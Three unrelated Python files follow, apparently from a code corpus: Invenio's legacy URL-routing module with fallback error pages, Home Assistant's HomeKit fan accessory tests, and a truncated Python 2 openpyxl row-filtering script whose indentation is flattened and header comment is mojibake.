# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Global organisation of the application's URLs.
This module binds together Invenio's modules and maps them to
their corresponding URLs (ie, /search to the websearch modules,...)
"""
from invenio.ext.legacy.handler import create_handler
from invenio.ext.logging import register_exception
from invenio.ext.legacy.handler import WebInterfaceDirectory
from invenio.utils import apache
from invenio.config import CFG_DEVEL_SITE, CFG_ACCESS_CONTROL_LEVEL_SITE
from invenio.legacy.registry import webinterface_proxy, webinterfaces
class WebInterfaceDeprecatedPages(WebInterfaceDirectory):
    """Implement dumb interface for deprecated pages.

    Any path below this interface resolves back to itself, so every request
    receives the same deprecation notice.
    """
    _exports = ['']

    def __call__(self, req, form):
        """Return deprecation warning."""
        try:
            from invenio.legacy.webpage import page
        except ImportError:
            register_exception()
            # Fallback renderer: just echo the message body.
            page = lambda *args: args[1]
        req.status = apache.HTTP_SERVICE_UNAVAILABLE
        msg = "<p>This functionality will be soon deprecated.</p>"
        try:
            from invenio.config import CFG_SITE_ADMIN_EMAIL
            msg += """<p>If you would still like to use it, please ask your
            Invenio administrator <code>%s</code> to consider enabling it.
            </p>""" % CFG_SITE_ADMIN_EMAIL
        except ImportError:
            pass
        try:
            return page('Service disabled', msg, req=req)
        # Narrowed from a bare ``except:`` so SystemExit/KeyboardInterrupt
        # are not swallowed; templating failures still degrade to raw HTML.
        except Exception:
            return msg

    def _lookup(self, component, path):
        """Return current interface for given path."""
        return WebInterfaceDeprecatedPages(), path

    index = __call__
class WebInterfaceDisabledPages(WebInterfaceDirectory):
    """This class implements a dumb interface to use as a fallback in case the
    site is switched to read only mode, i.e. CFG_ACCESS_CONTROL_LEVEL_SITE > 0"""
    _exports = ['']

    def __call__(self, req, form):
        """Return the maintenance notice with a 503 status."""
        try:
            from invenio.legacy.webpage import page
        except ImportError:
            register_exception()
            # Fallback renderer: just echo the message body.
            page = lambda *args: args[1]
        req.status = apache.HTTP_SERVICE_UNAVAILABLE
        msg = "<p>This functionality is currently unavailable due to a service maintenance.</p>"
        try:
            from invenio.config import CFG_SITE_ADMIN_EMAIL
            msg += """<p>You can contact <code>%s</code>
            in case of questions.</p>""" % \
                CFG_SITE_ADMIN_EMAIL
        except ImportError:
            pass
        msg += """<p>We are going to restore the service soon.</p>
        <p>Sorry for the inconvenience.</p>"""
        try:
            return page('Service unavailable', msg, req=req)
        # Narrowed from a bare ``except:`` (E722): don't swallow
        # SystemExit/KeyboardInterrupt; still degrade to raw HTML.
        except Exception:
            return msg

    def _lookup(self, component, path):
        return WebInterfaceDisabledPages(), path

    index = __call__
class WebInterfaceDumbPages(WebInterfaceDirectory):
    """This class implements a dumb interface to use as a fallback in case of
    errors importing particular module pages."""
    _exports = ['']

    def __call__(self, req, form):
        """Return a generic failure notice with a 500 status."""
        try:
            from invenio.legacy.webpage import page
        except ImportError:
            # Record the failure, as the sibling fallback classes do.
            register_exception()
            page = lambda *args: args[1]
        req.status = apache.HTTP_INTERNAL_SERVER_ERROR
        msg = "<p>This functionality is experiencing a temporary failure.</p>"
        msg += "<p>The administrator has been informed about the problem.</p>"
        try:
            from invenio.config import CFG_SITE_ADMIN_EMAIL
            msg += """<p>You can contact <code>%s</code>
            in case of questions.</p>""" % \
                CFG_SITE_ADMIN_EMAIL
        except ImportError:
            pass
        msg += """<p>We hope to restore the service soon.</p>
        <p>Sorry for the inconvenience.</p>"""
        try:
            return page('Service failure', msg, req=req)
        # Narrowed from a bare ``except:`` (E722): don't swallow
        # SystemExit/KeyboardInterrupt; still degrade to raw HTML.
        except Exception:
            return msg

    def _lookup(self, component, path):
        return WebInterfaceDumbPages(), path

    index = __call__
# Each legacy web interface is imported defensively: if anything at all goes
# wrong during import, an EMERGENCY alert is recorded and the dumb fallback
# class is used in its place so the URL tree still loads.  The bare
# ``except`` clauses here are deliberate catch-everything guards.
try:
    from invenio.legacy.bibdocfile.webinterface import bibdocfile_legacy_getfile
except:
    register_exception(alert_admin=True, subject='EMERGENCY')
    bibdocfile_legacy_getfile = WebInterfaceDumbPages
try:
    from invenio.legacy.websearch.webinterface import WebInterfaceSearchInterfacePages
except:
    register_exception(alert_admin=True, subject='EMERGENCY')
    WebInterfaceSearchInterfacePages = WebInterfaceDumbPages
try:
    from invenio.legacy.bibcirculation.admin_webinterface import \
        WebInterfaceBibCirculationAdminPages
except:
    register_exception(alert_admin=True, subject='EMERGENCY')
    WebInterfaceBibCirculationAdminPages = WebInterfaceDumbPages
try:
    from invenio.legacy.bibsched.webinterface import \
        WebInterfaceBibSchedPages
except:
    register_exception(alert_admin=True, subject='EMERGENCY')
    WebInterfaceBibSchedPages = WebInterfaceDumbPages
# The HTTP test pages are only exported on development sites.
if CFG_DEVEL_SITE:
    test_exports = ['httptest']
else:
    test_exports = []
class WebInterfaceAdminPages(WebInterfaceDirectory):
    """This class implements /admin2 admin pages."""
    _exports = ['index', 'bibcirculation', 'bibsched']
    def index(self, req, form):
        # FIXME: placeholder landing page; should render /help/admin content.
        return "FIXME: return /help/admin content"
    # Sub-trees mounted at /admin2/bibcirculation and /admin2/bibsched.
    bibcirculation = WebInterfaceBibCirculationAdminPages()
    bibsched = WebInterfaceBibSchedPages()
class WebInterfaceInvenio(WebInterfaceSearchInterfacePages):
    """ The global URL layout is composed of the search API plus all
        the other modules."""
    # Top-level URL components served by this tree, in addition to whatever
    # the search interface already exports.  Tuples map legacy .py names to
    # their modern component (e.g. /oai2d.py -> /oai2d).
    _exports = WebInterfaceSearchInterfacePages._exports + \
        [
            'youraccount',
            'youralerts',
            'yourbaskets',
            'yourmessages',
            'yourloans',
            'yourcomments',
            'ill',
            'yourgroups',
            'yourtickets',
            'comments',
            'error',
            'oai2d', ('oai2d.py', 'oai2d'),
            ('getfile.py', 'getfile'),
            'submit',
            'rss',
            'stats',
            'journal',
            'help',
            'unapi',
            'exporter',
            'kb',
            'batchuploader',
            'bibsword',
            'ping',
            'admin2',
            'linkbacks',
            'textmining',
            'goto',
            'info',
            'authorlist',
        ] + test_exports
    def __init__(self):
        self.getfile = bibdocfile_legacy_getfile
        # The HTTP test pages only exist on development sites; fall back to
        # the disabled-pages handler if the interface is not registered.
        if CFG_DEVEL_SITE:
            self.httptest = webinterfaces.get('WebInterfaceHTTPTestPages',
                                              WebInterfaceDisabledPages)()
    # Maps each URL attribute to the name of the web interface class that
    # serves it; resolved against the ``webinterfaces`` registry in __new__.
    _mapping = dict(
        submit='WebInterfaceSubmitPages',
        youraccount='WebInterfaceYourAccountPages',
        youralerts='WebInterfaceYourAlertsPages',
        yourbaskets='WebInterfaceYourBasketsPages',
        yourmessages='WebInterfaceYourMessagesPages',
        yourloans='WebInterfaceYourLoansPages',
        ill='WebInterfaceILLPages',
        yourgroups='WebInterfaceYourGroupsPages',
        yourtickets='WebInterfaceYourTicketsPages',
        comments='WebInterfaceCommentsPages',
        error='WebInterfaceErrorPages',
        oai2d='WebInterfaceOAIProviderPages',
        rss='WebInterfaceRSSFeedServicePages',
        stats='WebInterfaceStatsPages',
        journal='WebInterfaceJournalPages',
        help='WebInterfaceDocumentationPages',
        info='WebInterfaceInfoPages',
        unapi='WebInterfaceUnAPIPages',
        exporter='WebInterfaceFieldExporterPages',
        kb='WebInterfaceBibKnowledgePages',
        admin2='WebInterfaceAdminPages',
        batchuploader='WebInterfaceBatchUploaderPages',
        bibsword='WebInterfaceSword',
        ping='WebInterfacePingPages',
        linkbacks='WebInterfaceRecentLinkbacksPages',
        textmining='WebInterfaceDocExtract',
        yourcomments='WebInterfaceYourCommentsPages',
        goto='WebInterfaceGotoPages',
        authorlist='WebInterfaceAuthorlistPages',
    )
    def __new__(cls):
        # NOTE: handlers are installed as *class* attributes at first
        # instantiation time, so all instances share the resolved tree.
        from flask import current_app
        if CFG_ACCESS_CONTROL_LEVEL_SITE > 0:
            # Read-only/maintenance mode: every mapped URL is disabled.
            for key in cls._mapping.keys():
                setattr(cls, key, WebInterfaceDisabledPages())
        else:
            webinterfaces_ = dict(webinterfaces)
            webinterfaces_['WebInterfaceAdminPages'] = WebInterfaceAdminPages
            for key, value in cls._mapping.items():
                if value in webinterfaces_:
                    setattr(cls, key, webinterfaces_[value]())
                else:
                    # Unregistered interfaces are logged and replaced by the
                    # deprecation handler instead of breaking the whole tree.
                    current_app.logger.error(
                        "Can not load {name}.".format(name=value))
                    setattr(cls, key, WebInterfaceDeprecatedPages())
        return super(WebInterfaceInvenio, cls).__new__(cls)
# This creates the 'handler' function, which will be invoked directly
# by mod_python.  It wraps the complete WebInterfaceInvenio URL tree above.
invenio_handler = create_handler(WebInterfaceInvenio())
| crepererum/invenio | invenio/ext/legacy/layout.py | Python | gpl-2.0 | 9,951 |
"""Test different accessory types: Fans."""
from pyhap.const import HAP_REPR_AID, HAP_REPR_CHARS, HAP_REPR_IID, HAP_REPR_VALUE
from homeassistant.components.fan import (
ATTR_DIRECTION,
ATTR_OSCILLATING,
ATTR_PERCENTAGE,
ATTR_PERCENTAGE_STEP,
ATTR_PRESET_MODE,
ATTR_PRESET_MODES,
DIRECTION_FORWARD,
DIRECTION_REVERSE,
DOMAIN,
SUPPORT_DIRECTION,
SUPPORT_OSCILLATE,
SUPPORT_PRESET_MODE,
SUPPORT_SET_SPEED,
)
from homeassistant.components.homekit.const import ATTR_VALUE, PROP_MIN_STEP
from homeassistant.components.homekit.type_fans import Fan
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_SUPPORTED_FEATURES,
EVENT_HOMEASSISTANT_START,
STATE_OFF,
STATE_ON,
STATE_UNKNOWN,
)
from homeassistant.core import CoreState
from homeassistant.helpers import entity_registry as er
from tests.common import async_mock_service
async def test_fan_basic(hass, hk_driver, events):
    """Test fan with char state.

    Covers both directions: Home Assistant state changes updating the
    HomeKit Active characteristic, and HomeKit writes triggering the
    fan.turn_on / fan.turn_off services.
    """
    entity_id = "fan.demo"
    hass.states.async_set(entity_id, STATE_ON, {ATTR_SUPPORTED_FEATURES: 0})
    await hass.async_block_till_done()
    acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
    hk_driver.add_accessory(acc)
    assert acc.aid == 1
    assert acc.category == 3  # Fan
    assert acc.char_active.value == 1
    # If there are no speed_list values, then HomeKit speed is unsupported
    assert acc.char_speed is None
    await acc.run()
    await hass.async_block_till_done()
    assert acc.char_active.value == 1
    # HA -> HomeKit: off, unknown, and removed states all map to inactive.
    hass.states.async_set(entity_id, STATE_OFF, {ATTR_SUPPORTED_FEATURES: 0})
    await hass.async_block_till_done()
    assert acc.char_active.value == 0
    hass.states.async_set(entity_id, STATE_UNKNOWN)
    await hass.async_block_till_done()
    assert acc.char_active.value == 0
    hass.states.async_remove(entity_id)
    await hass.async_block_till_done()
    assert acc.char_active.value == 0
    # Set from HomeKit
    call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
    call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
    char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
    # Writing Active=1 must invoke fan.turn_on and fire one event.
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_active_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert call_turn_on
    assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id
    assert len(events) == 1
    assert events[-1].data[ATTR_VALUE] is None
    hass.states.async_set(entity_id, STATE_ON)
    await hass.async_block_till_done()
    # Writing Active=0 while on must invoke fan.turn_off.
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_active_iid,
                    HAP_REPR_VALUE: 0,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert call_turn_off
    assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
    assert len(events) == 2
    assert events[-1].data[ATTR_VALUE] is None
async def test_fan_direction(hass, hk_driver, events):
    """Test fan rotation direction mapped to HomeKit (0 = forward, 1 = reverse)."""
    entity_id = "fan.demo"
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {ATTR_SUPPORTED_FEATURES: SUPPORT_DIRECTION, ATTR_DIRECTION: DIRECTION_FORWARD},
    )
    await hass.async_block_till_done()
    acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
    hk_driver.add_accessory(acc)
    assert acc.char_direction.value == 0
    await acc.run()
    await hass.async_block_till_done()
    assert acc.char_direction.value == 0
    hass.states.async_set(entity_id, STATE_ON, {ATTR_DIRECTION: DIRECTION_REVERSE})
    await hass.async_block_till_done()
    assert acc.char_direction.value == 1
    # Set from HomeKit
    call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
    char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_direction_iid,
                    HAP_REPR_VALUE: 0,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert call_set_direction[0]
    assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_FORWARD
    assert len(events) == 1
    assert events[-1].data[ATTR_VALUE] == DIRECTION_FORWARD
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_direction_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    # NOTE(review): this explicit client_update_value looks redundant with the
    # set_characteristics call above (the first direction change did not need
    # it) — confirm whether both are required.
    await hass.async_add_executor_job(acc.char_direction.client_update_value, 1)
    await hass.async_block_till_done()
    assert call_set_direction[1]
    assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
    assert len(events) == 2
    assert events[-1].data[ATTR_VALUE] == DIRECTION_REVERSE
async def test_fan_oscillate(hass, hk_driver, events):
    """Test fan oscillation mapped to the HomeKit swing-mode characteristic."""
    entity_id = "fan.demo"
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {ATTR_SUPPORTED_FEATURES: SUPPORT_OSCILLATE, ATTR_OSCILLATING: False},
    )
    await hass.async_block_till_done()
    acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
    hk_driver.add_accessory(acc)
    assert acc.char_swing.value == 0
    await acc.run()
    await hass.async_block_till_done()
    assert acc.char_swing.value == 0
    hass.states.async_set(entity_id, STATE_ON, {ATTR_OSCILLATING: True})
    await hass.async_block_till_done()
    assert acc.char_swing.value == 1
    # Set from HomeKit
    call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
    char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_swing_iid,
                    HAP_REPR_VALUE: 0,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_add_executor_job(acc.char_swing.client_update_value, 0)
    await hass.async_block_till_done()
    assert call_oscillate[0]
    assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_oscillate[0].data[ATTR_OSCILLATING] is False
    assert len(events) == 1
    assert events[-1].data[ATTR_VALUE] is False
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_swing_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_add_executor_job(acc.char_swing.client_update_value, 1)
    await hass.async_block_till_done()
    assert call_oscillate[1]
    assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
    assert call_oscillate[1].data[ATTR_OSCILLATING] is True
    assert len(events) == 2
    assert events[-1].data[ATTR_VALUE] is True
async def test_fan_speed(hass, hk_driver, events):
    """Test fan percentage speed mapped to the HomeKit speed characteristic."""
    entity_id = "fan.demo"
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {
            ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED,
            ATTR_PERCENTAGE: 0,
            ATTR_PERCENTAGE_STEP: 25,
        },
    )
    await hass.async_block_till_done()
    acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
    hk_driver.add_accessory(acc)
    # Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
    # speed to 100 when turning on a fan on a freshly booted up server.
    assert acc.char_speed.value != 0
    # The entity's percentage step becomes the characteristic's min step.
    assert acc.char_speed.properties[PROP_MIN_STEP] == 25
    await acc.run()
    await hass.async_block_till_done()
    hass.states.async_set(entity_id, STATE_ON, {ATTR_PERCENTAGE: 100})
    await hass.async_block_till_done()
    assert acc.char_speed.value == 100
    # Set from HomeKit
    call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
    char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
    char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_speed_iid,
                    HAP_REPR_VALUE: 42,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_add_executor_job(acc.char_speed.client_update_value, 42)
    await hass.async_block_till_done()
    assert acc.char_speed.value == 42
    assert acc.char_active.value == 1
    assert call_set_percentage[0]
    assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
    assert len(events) == 1
    assert events[-1].data[ATTR_VALUE] == 42
    # Verify speed is preserved from off to on
    hass.states.async_set(entity_id, STATE_OFF, {ATTR_PERCENTAGE: 42})
    await hass.async_block_till_done()
    assert acc.char_speed.value == 42
    assert acc.char_active.value == 0
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_active_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert acc.char_speed.value == 42
    assert acc.char_active.value == 1
async def test_fan_set_all_one_shot(hass, hk_driver, events):
    """Test setting active, speed, swing and direction in a single HomeKit request."""
    entity_id = "fan.demo"
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {
            ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
            | SUPPORT_OSCILLATE
            | SUPPORT_DIRECTION,
            ATTR_PERCENTAGE: 0,
            ATTR_OSCILLATING: False,
            ATTR_DIRECTION: DIRECTION_FORWARD,
        },
    )
    await hass.async_block_till_done()
    acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
    hk_driver.add_accessory(acc)
    # Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
    # speed to 100 when turning on a fan on a freshly booted up server.
    assert acc.char_speed.value != 0
    await acc.run()
    await hass.async_block_till_done()
    hass.states.async_set(
        entity_id,
        STATE_OFF,
        {
            ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
            | SUPPORT_OSCILLATE
            | SUPPORT_DIRECTION,
            ATTR_PERCENTAGE: 0,
            ATTR_OSCILLATING: False,
            ATTR_DIRECTION: DIRECTION_FORWARD,
        },
    )
    await hass.async_block_till_done()
    assert hass.states.get(entity_id).state == STATE_OFF
    # Set from HomeKit
    call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
    call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
    call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
    call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
    call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
    char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
    char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
    char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
    char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
    # Fan is off: setting active + speed in one request must NOT call turn_on,
    # because set_percentage implies turning the fan on.
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_active_iid,
                    HAP_REPR_VALUE: 1,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_speed_iid,
                    HAP_REPR_VALUE: 42,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_swing_iid,
                    HAP_REPR_VALUE: 1,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_direction_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert not call_turn_on
    assert call_set_percentage[0]
    assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
    assert call_oscillate[0]
    assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_oscillate[0].data[ATTR_OSCILLATING] is True
    assert call_set_direction[0]
    assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_REVERSE
    assert len(events) == 3
    assert events[0].data[ATTR_VALUE] is True
    assert events[1].data[ATTR_VALUE] == DIRECTION_REVERSE
    assert events[2].data[ATTR_VALUE] == 42
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {
            ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
            | SUPPORT_OSCILLATE
            | SUPPORT_DIRECTION,
            ATTR_PERCENTAGE: 0,
            ATTR_OSCILLATING: False,
            ATTR_DIRECTION: DIRECTION_FORWARD,
        },
    )
    await hass.async_block_till_done()
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_active_iid,
                    HAP_REPR_VALUE: 1,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_speed_iid,
                    HAP_REPR_VALUE: 42,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_swing_iid,
                    HAP_REPR_VALUE: 1,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_direction_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    # Turn on should not be called if its already on
    # and we set a fan speed
    await hass.async_block_till_done()
    assert len(events) == 6
    assert call_set_percentage[1]
    assert call_set_percentage[1].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_percentage[1].data[ATTR_PERCENTAGE] == 42
    assert call_oscillate[1]
    assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
    assert call_oscillate[1].data[ATTR_OSCILLATING] is True
    assert call_set_direction[1]
    assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
    assert events[-3].data[ATTR_VALUE] is True
    assert events[-2].data[ATTR_VALUE] == DIRECTION_REVERSE
    assert events[-1].data[ATTR_VALUE] == 42
    # Setting active = 0 alongside the other chars must only call turn_off.
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_active_iid,
                    HAP_REPR_VALUE: 0,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_speed_iid,
                    HAP_REPR_VALUE: 42,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_swing_iid,
                    HAP_REPR_VALUE: 1,
                },
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_direction_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert len(events) == 7
    assert call_turn_off
    assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
    assert len(call_set_percentage) == 2
    assert len(call_oscillate) == 2
    assert len(call_set_direction) == 2
async def test_fan_restore(hass, hk_driver, events):
    """Test setting up an entity from state in the entity registry."""
    hass.state = CoreState.not_running
    registry = er.async_get(hass)
    registry.async_get_or_create(
        "fan",
        "generic",
        "1234",
        suggested_object_id="simple",
    )
    registry.async_get_or_create(
        "fan",
        "generic",
        "9012",
        suggested_object_id="all_info_set",
        capabilities={"speed_list": ["off", "low", "medium", "high"]},
        supported_features=SUPPORT_SET_SPEED | SUPPORT_OSCILLATE | SUPPORT_DIRECTION,
        device_class="mock-device-class",
    )
    hass.bus.async_fire(EVENT_HOMEASSISTANT_START, {})
    await hass.async_block_till_done()
    # An entry without capabilities only exposes the Active characteristic.
    acc = Fan(hass, hk_driver, "Fan", "fan.simple", 2, None)
    assert acc.category == 3
    assert acc.char_active is not None
    assert acc.char_direction is None
    assert acc.char_speed is None
    assert acc.char_swing is None
    # A fully described entry exposes speed, swing and direction as well.
    acc = Fan(hass, hk_driver, "Fan", "fan.all_info_set", 2, None)
    assert acc.category == 3
    assert acc.char_active is not None
    assert acc.char_direction is not None
    assert acc.char_speed is not None
    assert acc.char_swing is not None
async def test_fan_preset_modes(hass, hk_driver, events):
    """Test fan preset modes exposed as one HomeKit switch per mode."""
    entity_id = "fan.demo"
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {
            ATTR_SUPPORTED_FEATURES: SUPPORT_PRESET_MODE,
            ATTR_PRESET_MODE: "auto",
            ATTR_PRESET_MODES: ["auto", "smart"],
        },
    )
    await hass.async_block_till_done()
    acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
    hk_driver.add_accessory(acc)
    # Only the active preset's characteristic reads 1.
    assert acc.preset_mode_chars["auto"].value == 1
    assert acc.preset_mode_chars["smart"].value == 0
    await acc.run()
    await hass.async_block_till_done()
    hass.states.async_set(
        entity_id,
        STATE_ON,
        {
            ATTR_SUPPORTED_FEATURES: SUPPORT_PRESET_MODE,
            ATTR_PRESET_MODE: "smart",
            ATTR_PRESET_MODES: ["auto", "smart"],
        },
    )
    await hass.async_block_till_done()
    assert acc.preset_mode_chars["auto"].value == 0
    assert acc.preset_mode_chars["smart"].value == 1
    # Set from HomeKit
    call_set_preset_mode = async_mock_service(hass, DOMAIN, "set_preset_mode")
    call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
    char_auto_iid = acc.preset_mode_chars["auto"].to_HAP()[HAP_REPR_IID]
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_auto_iid,
                    HAP_REPR_VALUE: 1,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert call_set_preset_mode[0]
    assert call_set_preset_mode[0].data[ATTR_ENTITY_ID] == entity_id
    assert call_set_preset_mode[0].data[ATTR_PRESET_MODE] == "auto"
    assert len(events) == 1
    assert events[-1].data["service"] == "set_preset_mode"
    # Turning the preset switch off falls back to a plain turn_on call.
    hk_driver.set_characteristics(
        {
            HAP_REPR_CHARS: [
                {
                    HAP_REPR_AID: acc.aid,
                    HAP_REPR_IID: char_auto_iid,
                    HAP_REPR_VALUE: 0,
                },
            ]
        },
        "mock_addr",
    )
    await hass.async_block_till_done()
    assert call_turn_on[0]
    assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id
    assert events[-1].data["service"] == "turn_on"
    assert len(events) == 2
| sander76/home-assistant | tests/components/homekit/test_type_fans.py | Python | apache-2.0 | 20,146 |
#-------------------------------------------------------------------------------
# Name: 濠碘槅鍨埀顒冩珪閸?
# Purpose:
#
# Author: zhx
#
# Created: 17/05/2016
# Copyright: (c) zhx 2016
# Licence: <your licence>
#-------------------------------------------------------------------------------
import openpyxl
def main():
cctv_data = openpyxl.load_workbook('train_all_feature_reg.xlsx')
cctv_new = openpyxl.Workbook()
new_sheet = cctv_new.active
sheet = cctv_data["Sheet"]
cnt = 2
for r in xrange(1,4749):
if r==1:
for i in xrange(1,29):
new_sheet.cell(row=1,column=i).value = sheet.cell(row=r,column=i).value
continue
print r
picture = sheet.cell(row=r,column=4).value
min_min = sheet.cell(row=r,column=9).value
min_max = sheet.cell(row=r,column=10).value
min_mean = sheet.cell(row=r,column=11).value
num_posi = sheet.cell(row=r,column=18).value
if num_posi == None:
continue
if min_min == None:
continue
elif min_min==99999:
continue
else:
for i in range(1,29):
if i ==4 :
new_sheet.cell(row=cnt,column=i).value = int (sheet.cell(row=r,column=i).value)
else:
new_sheet.cell(row=cnt,column=i).value = sheet.cell(row=r,column=i).value
## new_sheet.cell(row=cnt,column=2).value = sheet.cell(row=r,column=2).value
## new_sheet.cell(row=cnt,column=3).value = sheet.cell(row=r,column=3).value
## new_sheet.cell(row=cnt,column=4).value = int(sheet.cell(row=r,column=4).value)
## new_sheet.cell(row=cnt,column=5).value = sheet.cell(row=r,column=5).value
## new_sheet.cell(row=cnt,column=6).value = sheet.cell(row=r,column=6).value
## new_sheet.cell(row=cnt,column=7).value = sheet.cell(row=r,column=7).value
## new_sheet.cell(row=cnt,column=8).value = sheet.cell(row=r,column=8).value
## new_sheet.cell(row=cnt,column=9).value = sheet.cell(row=r,column=9).value
## new_sheet.cell(row=cnt,column=10).value = sheet.cell(row=r,column=10).value
## new_sheet.cell(row=cnt,column=11).value = sheet.cell(row=r,column=11).value
